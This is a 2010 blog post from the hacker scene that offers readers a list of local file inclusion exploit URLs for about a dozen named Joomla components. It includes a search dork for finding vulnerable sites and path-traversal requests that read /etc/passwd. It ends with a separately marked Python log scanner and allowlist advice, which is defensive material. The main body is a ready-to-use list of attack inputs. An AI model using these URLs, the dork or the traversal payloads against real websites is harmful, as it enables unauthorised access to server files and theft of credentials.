midads

Monday, 02 August 2010

Bug LFI injection


Greetings of freedom. "THE SYSTEM IS NOT PERFECT" is a slogan that hackers and crackers always fly, whether you agree or not; please answer that for yourself.
Apart from that, tonight, for those of you using Joomla on your website, maybe it is time to worry and be alert. Maybe your website has already been entered by a hacker, or perhaps your domain is already part of a botnet. If so, I say CONGRATULATIONS: it means you have felt it yourself and have proof that the existing system is not secure on the internet, so please improve it.
And for all my friends who to this day still continue to grow, I have a little LFI bug that may be useful to "us" :D



Xploit: LFI Vulnerability

Demo URL: http://server/component/music/album.html?cid=[LFI]



======================================================================

[?] Script : SEF (Search Engine Friendly)

[?] Home Script : http://www.joomla.com/

[?] Dork/String : "index.php?option=com_sef" / "com_sef"

[?] Date : 04 July 2010

=====================================================================

Xploit: com_jejob LFI Vulnerability

DEMO URL : http://server/jobcomponent/index.php?option=com_jejob&view=[LFI]

=====================================================================

Xploit: jeeventcalendar LFI

DEMO URL : http://server/component/jeeventcalendar/?view=[LFI]

=====================================================================

Xploit: LFI Vulnerability

DEMO URL : http://server/demo/components/je-media-player.html?view=../../

=====================================================================

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_picasa2gallery&controller=[INDONESIANCODER]

=====================================================================

http://server/shared/help.php?page=../../../../../../../../../../../../../../../etc/passwd

=====================================================================

[*] Exploit

http://[site]//index.php?option=com_g2bridge&controller=[LFI]

=====================================================================

[+] [ Live From Jogja ] [+]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_mediqna&controller=[INDONESIANCODER]

=====================================================================

[ Vulnerable File ]

http://127.0.0.1//index.php?option=com_simpledownload&controller=[LFI BY ARUMBIA]

==================================================================

[ Vulnerable File ]


http://127.0.0.1/index.php?option=com_mscomment&controller=[INDONESIANCODER]

Poc/Exploit:

~~~~~~~~~

=====================================================================

http://127.0.0.1/[path]/index.php?option=com_dioneformwizard&controller=[LFI]

=====================================================================

http://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpg

http://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.js

http://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd
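
Seen from the defender's side, every URL above puts a file path into one of a handful of query parameters (cid, view, controller, file, page). The following is an added example, not part of the original post: a Python check that flags such requests in a web access log. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Query parameters that carry the include target in the URLs listed above.
WATCHED_PARAMS = {"cid", "view", "controller", "file", "page"}

# Constructed sample access-log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Aug/2010:21:10:01 +0700] "GET /index.php?option=com_php&file=../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.5 - - [02/Aug/2010:21:10:07 +0700] "GET /index.php?option=com_jejob&view=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 512',
    '198.51.100.9 - - [02/Aug/2010:21:11:30 +0700] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 9021',
    '198.51.100.9 - - [02/Aug/2010:21:12:02 +0700] "GET /shared/help.php?page=faq HTTP/1.1" 200 3310',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded separators (%252f) are seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_reasons(value):
    """Return why a parameter value looks like a file path rather than a name."""
    v = fully_decode(value).replace("\\", "/")
    reasons = []
    if "../" in v or v.endswith(".."):
        reasons.append("traversal")
    if v.startswith("/"):
        reasons.append("absolute-path")
    return reasons

def scan(lines):
    """Return (client_ip, parameter, reasons) for each flagged watched parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = suspicious_reasons(value) if name in WATCHED_PARAMS else []
            if reasons:
                hits.append((line.split()[0], name, reasons))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit is a lead for review, not proof of compromise. On the application side, the fix is to map these parameters to an allowlist of known names instead of passing them into a file include.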
